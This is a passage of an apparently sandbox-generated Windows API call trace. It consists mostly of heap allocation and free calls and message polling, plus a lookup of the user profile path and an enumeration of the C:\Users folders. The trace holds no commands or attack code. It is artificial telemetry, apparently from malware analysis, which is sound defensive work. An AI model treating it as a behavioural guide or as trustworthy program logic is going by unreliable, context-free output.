dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db38 [0209.576] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.577] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.577] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.577] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.577] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.577] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.577] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.577] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.577] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.577] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.577] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.577] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.577] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.577] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.577] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.577] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.577] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.577] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.577] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.577] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.577] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.577] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.577] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.577] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.577] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.578] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.578] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.578] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.578] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.578] PathFindFileNameW (pszPath="") returned="" [0209.578] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.578] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.579] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.579] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.579] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286490 | out: hHeap=0x750000) returned 1 [0209.579] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.579] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32864e0 | out: hHeap=0x750000) returned 1 [0209.579] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864e0 [0209.579] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.579] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32864e0 | out: hHeap=0x750000) returned 1 [0209.579] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.579] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0209.579] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.579] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253540 [0209.579] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253588 [0209.579] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253540 | out: hHeap=0x750000) returned 1 [0209.579] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534b0 | out: hHeap=0x750000) returned 1 [0209.579] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db38 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da20 [0209.580] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.580] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db38 | out: hHeap=0x750000) returned 1 [0209.580] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db38 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x7c0000 [0209.580] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.580] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db38 | out: hHeap=0x750000) returned 1 [0209.580] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db38 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x794718 [0209.580] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.580] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db38 | out: hHeap=0x750000) returned 1 [0209.580] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.580] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864e0 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db38 [0209.580] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32864e0 | out: hHeap=0x750000) returned 1 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x498) returned 0x32ef8a0 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864e0 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286490 [0209.580] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84398 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84370 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84348 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84320 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a842f8 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a842d0 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a842a8 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84280 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a840f0 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84118 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84140 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84168 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a845a0 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a845c8 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a845f0 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84618 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84640 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84668 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84690 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a846b8 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x3a86078 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x3a860b0 [0209.581] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x3a860e8 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84230 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84208 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a841e0 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a841b8 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84190 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a840a0 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a840c8 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a843c0 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a843e8 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84410 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84438 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84460 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84488 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a844b0 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a844d8 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84500 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84528 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84550 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84578 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84258 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32864b8 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286508 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286418 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.582] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253588 | out: hHeap=0x750000) returned 1 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da20 | out: hHeap=0x750000) returned 1 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7c0000 | out: hHeap=0x750000) returned 1 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x794718 | out: hHeap=0x750000) returned 1 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef588 | out: hHeap=0x750000) returned 1 [0209.583] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x794718 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db38 | out: hHeap=0x750000) returned 1 [0209.583] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0209.583] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.583] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.583] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.583] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.583] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.583] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.583] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.583] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.583] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.583] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.584] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.584] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.585] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.585] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.585] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.585] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.585] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.585] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863f0 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, 